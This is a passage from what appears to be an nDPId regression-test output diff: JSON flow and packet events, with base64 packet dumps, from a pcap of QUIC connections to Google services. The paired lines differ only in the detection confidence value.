fYbmnl2iWasHW8AkLql7Ucnm9wslVj\/YWb2c6IF2fyJjiByU3v\/tWqKcs4QGqfKnNSz7TAvliCZNV6Zo4gfpjCqzFPRaJI4yeyyqsAh\/yIYVP9ZV+w7uilAeMXgI+K0KIlxsOhizEgVDitG\/KAo9LOeN6fomCXq4209QrcrNd3XMwKvH9b188UgNv\/jRvXciyaJGIyMgJ7mamyBtbMq07La5hMyvo0mSqFOXeW1vGdKnMpuiGY5RTAHMnhNlkaZqmORAjp34HPN8n4vG44MH5AJ7tXiPcaAMzbgdmd6ox3fd0BfTrlccudwRllV1uZTxS3xRBBhwWhqTZE4FhxMXqd4endwazGj4NY2Vq7gD8YwyUO508LgWL2kYAd\/HfPDFLaaugd7M4tl4hSFuXNenTPDtb\/bRXBfDbvsb6xXiRig92+oFBV7pEoV5L\/yiJ4P2gax0Ac11TG31dQqdzo9z3YfYxfMa\/+8LYBIBydV8pcGIzVQDhSjN2LC5nUQOTcNfPU\/oVh0Ybk1aIMEU85MfYtwrsAgUEMpEGProetQB0mTzcYq+lEmbIIU8WPencLFFFL9uSVHveeIfGWVYNsJ7jljceMSgP5H6cv7CnQzsqS8dQ4uaXalyrjBXDSyJmCkDvaY220xAc3pj12kdE4BvFmAtStxWdtg66AiG7qv91s5V3en6J6UAronI\/KmR8EOk5BiV2TYsFERt4G27JNG5X\/AJaZ8VwtC2WsqvDKaMKYDTCCbRtilBnZ79PJ8INFhsaJtQDLjVGnL0+0lag21H2c0AgRlVIciNuUToDrQp+pYnpr3L\/mM63uQTkvv5eBIAP7i9VCEUjMABfjlzuA4QlRNUQ0vfIchW72uzMqFErT0XMVPnKFlDHN9TDNIkKHDeKZQaWZA\/OfMsV7evfLcQ+ddG\/xKNaoq8806UcjLdGTZEiKme6xLw53P6MT79sTHldTCpjPaldQ3tMH4EIg1InZbS5ktmIvlLQ2zHCeJ+cCrcDav1P0xMr+DLvH3rXDc1LTF\/hYsBxIYeS7vsQF07Zw9I0Aabf0GjuxOlwnW2Bt8iPysdcUeHkriGdeS3Czvq\/nkZEaGKcHJEnfklzqeTz2bYQ+Sks
hE9F12pfc0agQ0tbVdAnKaEKIsSgzPUMt7MgzYsL9AUkoIblqKn2hXfFXW3gr6XbSi5TQygflSMy28Bs+5OghyrSNcFcOe8e+DTn5mmzjD5O4rsNuXEgF7wS26+FyMgZbWHqX8HMifw3qMfcAQ1nT3l97zTbszeFs6\/goTc7uST7XEMKSKrS2lP7e\/ELG11fN8X22oM+TfVd0wylz3v0e6ThdB\/tMpVkNfw82FE39BRdoKw04E7yZ9lgCOyxJvMvSEQRhX0eoTiGgfBQDAhtTklq2Zr0UEwX8LiDkDQg8kHbX+ady095CUYxnxCvxjTB8g7HIHtQ37uzrFXIL6Nxg8bDtLpiJue2jB8lwh4plomig"} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417111064,"flow_last_seen":1621417113176,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417111064,"flow_last_seen":1621417113176,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00595{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":10800,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1621421253470} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621421253470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253470,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLlAAH4RBzKokEAF1Bb289hQAbsFTvjXzP8AAB0IFOutyi98gDkAAEU0QEoUNnfb6spEl4sOhm7a3kYwPyh0twGQme8gnUbSWjlTM0eV\/33jZKgt8R3qtWDm2zSx\/rpQpEqQQvknW76YTyqy8lhhBH0HTupzxapnAU360wL\/+pHUQa9kkbfGs+rg0fJIwO92cTdSFU4vLU7xVz2fVMJaMQH8aHE\/1fVdWPC5x1T42ZLsnrxIMQ5wxIFrryrh15fMsCUmzvgSHxA\/i23NsVEQK0FaymSQ3vTxzLlBUWH4BZEKhwxODiawYJVn6KqbmqIqOPZjXiYZhiN\/Oc0\/LeCyQFaH1ri9xPnu4k\/db5yW\/Vm5M7J0u3m8iCZTpmZh9UW7Vz+Tt6ZtpNNUgyHlXEXFJ93VOxKXczX6MviwyGemHWSQL48Z\/padN7yuSlVEbH4WE\/x\/ebW7zTY276B4XQ+wlkch4ZzVURSVv2IJCLTAANRAmruSTCorJVR33qh+1laWpf0XjXQiid5xdrcBQeDZrONgOO69EM9SiLwEVtc0TpitDpJidyT0U1tQrFl70d\/XEPdy6sl8efWo7ZCqMlidLhPlq3NrVHxg4+Rm0hcmtJgElwEuqTGiLadNGhoT7Yo7j8pSYgNw7GRtSquhp7H3+FF2Y2bFNX19Z9+rRsJB4pUiilB5tu0adouOMnwmGTBRsatrnFOOtA0F2vX+LGN0MZFmEF5dpYuvWiLOa+K0fw5uMZaD1DwO81ez++YVlEQYMcGk8nRbrvkTr\/h1NjMg4AGD90jQKUb4FofQXWaVczScZMMs2v2AijtxxRDHmaMhESOLxFfFbAGY7GSyIn06ETBx10YXRTWxeT0eUKlaLwKeXgT1f9Nzee8owqgOKrkqV2dKYlj65fZbe64rFKZ1qmuSQpeN6luwI34bKSC\/P1YZm224OWk7dK8zYb6iVGqzON\/pvHnYbfT2ttIlhWIYxtY8Ju6yt1zHvLgcU9f83bCChlVephnGaWCxUwUlXnYZevAlJBygTGyZxTz2ZSb0ie32uT7qgPEA8\/VhOVmgfgz5uz1CkH7wK301uXB6Jd+vCV5C\/oxE\/jofm4fBRgusDmoz+6N3GpdbS6mlSoo0uqerAGszdbsmbuicOljSko4OAeqWoT+mGW7afPjx5a2FUCfO2SrBsu8hZPpnDhlhRCeKCJQcAHRB7xgiDd9eCcdbKD7Wu6I5NAMZ9c5cy\/ihBVX35Z+UgC3RyusmI0NtKYhjUDswCM0eyBoXLaZPl8INR9v1LW+yvOTZym8K9Aj0qNkha5Yzfvxik20hZiRqz1bdL8xXLCFYqYMYQEadOjp3L+P6FsQzEDaOxkrn2NuRIxBUQl17JREUFH0XnFwFnMT7z5vgxqMs+\/cTusvocWbp9TisAPxAunu5IgIhjJTjwzvXKQEqGGTx\/Uv95lseYEkyPjUxRZUqo6ayvxQzUbD7WzEPJfWp4V0dKCqk8jMcfr4gKrj2FSp8Pp2y\/+11ISOglp7xB6eIZFO
0ZgRIY37WC1adnktqCSKXkgYJUGB+Oc8sMK4ta5iGShCsKCGNc84cXtiEBSa78agZzOMcgLZMHRXRJQcxDXBaC6GCHQXnLhoom2lIO8IpQOLCvA+fkPsBsI1oOJHnHV8O+hHfPFWWAiSD\/PB9nE4NwaIPKU4ZyWnacfkkFlYLZfqca8KZX4UtWN\/IEVTbG6\/oU7nJ0oyYFSxJfcA+XMb3hdr7h9ytVk4VGIeEwTkm3q4IbP0kGL00wYVhVU92VFVVNJemgeHNnaAUtTEkhmyuDDVqFnLFxbtyS6nB8YnwnujNnjXs"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621421253509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253509,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLpAAH4RAAiokEAFhcpMaf3EAbsFTviHzf8AAB0Izn33GI1xCTwAAEU0Q2KPp18EaD7CNRYkzOIN7dKmyWbS+N+cMemkf0psuzAGPfIWZySwPChV53Otv2dvXoDe3uezGPqpumIIkBf6E4Y8ZQDOb1kq7QnyaNj76pl0Rg6iP52gI2ik9D7s1o3thkJPMbsfxV+fuIPAKjePBjQmUP19frND2eTijGA2Jo0+u9aOzf5exzhhFq\/6nELW9tIN5cnw1mNp97ad1+XFptBiaaHUht\/AwUETMgLsBZ6XrHBGlpBY2lK8op1hzm0CnYVtS3Djsl5T\/wl54X2bN40BKcjIeQUAIe+9lSfAyX9VzGt1lyeq7sDtfGOULnyc3MRIbszfJgkdcma4KWIGUispqWzhbI1x5e\/RjTMlYyCVLmuxtCNhv9eaj9oPhvwV6QA3gM9QoCLiA0CWKH+SJGX2Rw5rZxYoMKeut8jwQsj+lIDaZR9I2\/AyKbpAZBbM0cPn5VbbglsRXZxJcp2ZEFpU9VJWoFGfCqiok1ySmzzALJ2o9fBW3oS1MBkHpHdYLwXsXSSHZum4zp4LAa6hwGEqhfT3QKMIosJCyQXQx90hg4FPeCfhcCzS0yMxKuIS7muPu13HLa3vp6BZSjDm+YGM2\/EP2rfLAV\/u73iBfyrpH4
MVfT6XT9GH6DxrXWXPtmgj3dd4ZDJSS2EE1yZ7NzZKZHIzRIJhx+M60uskyfvEmdMlqpu42sPL14XVPHdNYMnoUS8X6WLni0o2VZmxQk3SYBjLMZKHNJZHUGBqZyOnDiDJEDUgCVpgpbyumDZBrRfKCG8xPvowcATyQ6821WIR6CIzs8Om8jqqi0JAvkN016aaA1p5ZCJQtyIP7RVszaos5bQYBNnQzPdcPSfCMMPRbEcbBLR\/8PEjZSJVMTynsuFnVR9jIDV8r\/dX3HTmyKXTIz0yNwtPT4H5hqTdaTXb7oaS8Zarj3bCmVeadB08cU+k5BSQkWcmvSsbxQK9L6WXdRC9SodhjDB9zefiVEPcSl7soHeKsNvYTyCkd\/XAIWMwe3bRjY+Kv\/KQy8Hwi5otEn\/W6Ht26F+Edg2+van4m7BF2EhqU16TwOM2sNd+iloXCcatqE\/C3MKqQU0Mkp2P+yV7oFIESvsIr0RB7rv76hjn+agd\/IgZmvvKb7bk9hq2XrH0HI1yi6DgeQgXvNKOZmzlAcpcvnqKhOiyX1pKXCxj5WdM8xyZrw7dWBYG9J+ZB2jRzA3N6g9gR5j+cHtRybtWCobPi0uMCp5Y\/TwozHIDGhNtykeb7ruqTg++bwL4cJPnLkfBMRka0gmne2r23CHGqUhUs182QVxVo33BcapLgO3qmkaZWUAfgES6E9cYn70KRY9mjRR5JB4LkRsmI2UaT20HAZw+DxdsM5YLqgbKe6dhNV2IOrhV\/TxAVxh6mwBPFC3umIWlZnFUvPCLyY8UM10QQ71eYC1SJ9eB13EtUmpWxQLGyueBG7P4\/oLKTc8PuLFHXfG9dQSOw1wE33A+f\/cnDT1FhhN1YqVpJQdPwJ4Wf5eVBxsn9JpIRrPWbarviWoroALVlD67VbRZJNKwOmE1HEEKRQZwrLkbev1NeFysxZPm4Y3TUawK2sEWayDygW6x6RN0NNG2Fay3n6wsNuNc5zitBxQaUj7zNSVElsX4h6XDvK98\/ECQwIKitJALgcMqiEiqaEc6pa+ihQlR1KKvzUudiOciEKxejDPhTjufOq\/UxVIzxEe1epyXEZvbVAZDgleZWCCPNPFEFpRRnINh23vNKajIxj\/Lj7QDAzP1y74FtJQ6jIyHxOrz"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; 
x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 
02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621421253804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253804,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMJAAH4RBymokEAF1Bb289hQAbsFTib0yf8AAB0IFOutyi98gDkAAEU0cgaq22OVD8Dk3cOFWT0xE9g+YCtQyxjYAZuBA+biQ0qlLk4G4l4FhrZTdWwEHJxix0i32WGF+VFP6SA62mk\/ahCh08zZkteiAklY2im5lzs3+hv5CXVaBoCsdKzK43351bgh7lFz2rLxgClTUrt+ggkqZgyH3xqh52dtUrDyoAHPTLnCu42bYt031EP3XjXnQN0tMqOu6lBcFDhjD4aNjqQ4gVCp9D2V7BmRO3otj4hId4G69dqomvKCMk352TcjhRI9Y\/b1HXLPEwZJR5SMYjM0bHHNJ8TU9yEz2sN8hXpEtMivH1XdJw0Eh8yYm64H83Y0HweIMWoyJiqpIlytTnrgkym64mLXXZYZW20KwPHeajlZF05XF3+pFt+uQ4GzrV5Dcx3AxUpXpEdoKl3n0ELxD0JH5ljs0a9w9Sbz1XKL5rFy7vCM8UkbGTH6qJsw9yuooY6A9x3BRJQldn\/cjpkxSonTfoT4ntKav5Abl2PQ2R\/XKxdCsedHmqW3DEd446DYQ3V85\/1reu7YDBrYnSyXTqTmbkWgxwxd8QGgoAa5urrS4Odki8E\/vxPzpvhWle2+YavjiuVnuPplOSMtA6eRixeu+Twyp\/mNZvJOkN9V44x6h72ppz248KXCbVBzRH+1a3Iw2Xt2l83WqoJ1ekOv8wHN6\/oiQJoJREH+g4zwPsZOsNyZDHhogPOptnRw+QNIjvRsgAplHaOx6D\/aGIthoZ3wqTLG+A+DTy0A7fbLu\/5uA2OrVkih8zEFgbKa96QzE7xsqMQsB29SUtTTgtaJ+x6DDlTxsS4y5GvKhs5RqCJuqJHJsUqQ+7qZO1IlfyqPjfQ4TdX3QR4WMaYivWpDgEtSZdNrgxDq2rS0MQKGr8L9tinW33cwo4ycFk5CyESoY2JbgbQLKBayMDiWClTvZot+D9gQ1USNgzNYyMBTHtywu3XkQJpOb6Cu+Cndw7HuOQ148pj8juCxBmSiBwgMqay2jsiMwE2rp2FJfE2pZCpCtkbGUbTD71AKVtAmD4PfgtOBCxaFvaclNBN01TZzkSP3ySV9xnlyk0aicuahfnr0uqssjLhU2lGOlia1+DO56SRT\/clcAVgh6RL3+lpZujJgQPm5EcCP+wloP7VOsnzWGwL9wZ7hJ40ht20W7jRVj3M6Els4r8Cq410yu5FloDOrNepfpbxjkZc6ldqZDdLri8F2g6JJ17oGz0uM4ZxyqgwoLWq7U+nURI2WoUDTSzDrhufyUwR4DJ9ZV1quggqjhetj0pzAZYuRLflR0X47yy14dCpQ\/vVyn1z2ua4Ul1zLKn5MiWFnBJIu6nyxsGQcno71kQag30voXKBH7HnrnnqUlbqOkjLEl5S\/FyD25Vd5cXtgniVi6A\/QPlDEt7HGYkYWr7\/lkpumd4\/NE+Jp8u8oDIJ2Pl+kBJ\/VZvw2TrQDNhyPOtdvHRPiEX8B8fs+MFSjeA8jQipbDbOQYT8s
hK9HjK1kt12l1A1WeA2E3iBlpveLOL5cYs7Ony3vhCFnJiyDYilQrHHcfZ4DT7xi8UHB2ER5kb0BMJsGRBThDiMxgHeTo+e7mFH8tDgNfGqLuRHyVlf8NgieuPUXEgyKmqYEc4LvmX4l2717+gqPnFHj\/U1TWUHnb92m5p6KStXy9LMrfKKfgW3hZcvDQuM0RslMbJ8u36V\/B9KSp7x2ODcgpxNNuc+y4vHSpU+\/5E4AvDNNuskmG4wvM2AAovGTD43c7ggngGXtjGnBtB4EnktPIpxqtYgo+FpqvKts45sp"} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621421253809,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253809,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMNAAH4R\/\/6okEAFhcpMaf3EAbsFToEwzP8AAB0Izn33GI1xCTwAAEU0rIRdWSpQJq8RNm\/YHCWv+5lOAS3ExdrQfSyR3179\/1dRds5Ne7rTKilnr5qOATiPuwy9kvVwvXmlvh9A4pBwrdy5rwj\/oK+soxKE65UpWeIIcbWAdsENETDsJvZbt2iOx1FT02Zh0k4wZRYa9T1mqEIw9vucjUxsVJqzuUcDQocELhq992N4Y\/d7WHUCkfrvzFkWLhfQuDRyyFD+FKVASnwCfjWwtYzJWfj8xdfdTc5foWxQy8HwatcneUH3Xe7KQloP91UPff0ZYs++gTR2OGCqiGo9QElgV7ipEPa\/a2VVjCezu0CEeDpnKAtNRmt6Q4uTlIuuLMwbpsrTE0g\/MqtsqQu5OpuusA8+8yooJk3wiUUBIcxT0LyFbbJBiUpy1jybiKvHv7sxWdofXLuT2tOVm\/gYEKYpYhJ2fQxRlq05FJNYAJ3x+IPKgL4hZDLQvZau5wz24pWxuyqaqk\/7pdJCP6tcxGJEigvqrGszDAU6Vnuxr\/raz+JVrdGz71r261HwLy7jCLV4GVAGwqXYjimp+lVj7ZrdOYwdRbkgTFkqZGqGyKwNKcvkP\/vIHt\/aqsMYIwNldiK9WOSo4NjVWqS9IQGKVhUKZzlXrupygWzjxqeGR5dlZJFEihDxxcQCXNUgswqiXbBiU7jvlnjci\/Wa5nSBAjcoxUjUtEV\/Hmpt8r23oBWTbgRE9axl1IWGAHI2tDK8zoknUr82ajxFez+Gh0wDV\/MCeDcDUfVqAg5v+qUe56To\/xvqvZFgwQiXcqe7gIfrPgAP8QI6n6FSGGFXoDNKL9zay3oJBh5pSSHq1DCM9w1SKpHiwhq80tTvMNgKeuRDzvkzeQ9vDiuRQ1F0\/isFVcoHn1e2\/Qp6mJR8Lg6OjGTB5n9wJt0GQq6bX9nGsaRw4XAmHHPfPtRRrzAXpU5KuOSCBB0+ShvIxmEYlsFhYFhXfYMIaUqR+yhlwtPSDafAHcOechwW\/ra57z3xNbXAdhHXxU99F54Cb3HNcttIif3ThTZ5o7GOV8r62PLfOpQ7VeKZhnB9VXymajUkSEgKnVtYFRaDjiFok1vqKqx3wzDiPNSqp7GpEl\/yN2vdzXQrfZOp+0yTLLStC7aJ2V0VsJ8NuI036psv9S1AnkXkUUyeZqLHQXmxWBVEUWEJ4aw\/ZZNwp
J2tHF897PYgr1CTWWw4CttMzQLaBZ51eX4RHRn9kLCgvlyq1tMUT+4YjYbnn8RYbz9eqTM4rSN8tz92KR9Fcc0\/dMjAdKRSNurGmNpDEtITPjaUb1n5VBZmMevuy+YULm\/K0LRcgr3bjEgYFGgamvIUyTxG2IxIE6DmCy+rl9rr5F+rE4LgtHzkBPE4gC8ikWb\/UxYBUsyEZNAp4YWExPD5uevZdPSpVZ7j7K7PYss5uBH8TZFtKaqXjAaBFvo8+Iamk14Oh0pgrgxGqB5+UxZOAubhS2tMB7iGe14ZAIAuXL57InGtj0kim3J\/3bjlX1lKzHdAjJDSJtTIdaauSA4wIm+5djes7nIN5l8yHcP+jbpw79vdXui0DIhf0YIIf42Ya8fgEVunYI3yggTOU1wruhfAOOAN7F7YY31Q8MJfLj0qlihs1B3a0b\/W6jVRhMJ+QZ5ut1F8vzQhkHEbOYzm8VcH35XK0f1lM+HrHe56zOhDCcJ1Uiq\/nKgQwd8FV+HuWjkyGI8NRs6aas3Ro+mmhQzK2gIzxAmNbNSP65H2kIq72CE6rc1ZiknuHgwgzCMtoH6gzt2XSxfShl6CHvNrwhQToP6hE8gE"} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621421257105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421257105,"pkt":"AAAAAAAAAAEAS1QMCABFAAViPbFAAH4R97iokEAFcAFpitokAbsFTiafzP8AAB0IMK4bzt32gQ0AAEU0P1azBnSUVl3HX4NvBpNVZqFjb\/POClmZ90yDhIH3saXV4D8hIZuhFmh5K80mFHsQUDzJ5Fet2Vi6MVVm5vzpbtDzb3iZEgIWreSd3Ir9FMXdj0HVjyEDw6EuT6gRAjE\/21rarOXtm19YMu7r45cH8xqJwZu0MlI7uXzcE9RAeMgLEW6YsSaB9O66L2651H8GQJ90pVw7t2KzRklpg4gkXdUjv94LX0mxpP01vTf1Uur6iVP0hra2u3O5GqhBWtCeqqhiUxynXsEiIqqL7erxJ4C5Ceo+YBLOH7PyZpxjMcY0M8UKVHZb40RZzejcLgSUNrM70SQtZDilREUjdX4V1RitcpSnBwGOqBO33JSlA32uZ9lAm7tfb4HtFuyOK7Y6+s36I\/tJjlWkNcLN5vycOCCgMR\/iEDhDBTaJipsDN7UZescDsrCVRT5tibuo42Z352l3NEmt8qok03JQNTlENsa+Ywn9406L57nvC0pFdYqO6XoWy3oIaLpLL2+6gTc60MDWTKJ1UrBBU+uti2j2vV131OfFLy9NEug6HDeJt07pHoN0abz03ktCcugMdfCJCqkojUbtwT7bcr1xv+H+nfxzLGaBENVle48BJL9n\/fQwRUFpWqNRw5YGEoFUAxgSYLrjI3+8yOHpS2TW54iDb5TgzKjzNgy7VC2hqyxs\/JyaWpx4tfVLM7fnb3BOMLq3RoDDAtkcsoDjHUMbZOotwqG7NOHSskx0+10KvcYYmNrJIaQaFda2wEUxuliGNz92g6FqP4oZMZQBZxkpxPDgYdYLuH0duracuo87qqjlRGPQapq15Je3yha81nzNRXHTDeNDxWfcXJluZNq0kt+qGDFlSY8n8xUueL9DqKmN1IsXo0X0yoNp38aEiv4BJxrbHkZ8MuGE\/2IEPBTeie7PMbLFS2yJwVIy5h4KShSAWHX8g3+pMhTlu25endl0GCcr5li4yhDfLpQ3S0rInsXaqmpIA6OYG89d6KlcK52aGKa5+qjgFprLpAqwYT5Z65JHNpW+TG9KZbT2vFhcZengw3A92EI\/TcEXiRfmF2ssJ5ysj+mCfUOmyip94PexKb+mHdBLChKLXIrLeY1uTln0pTICSsA32Tt+soXhVUyCfGQOxc2GxwvPc6T20BN51nQPn600Q5UViN3viKdCuJEUlNLh+yWrsxCBLb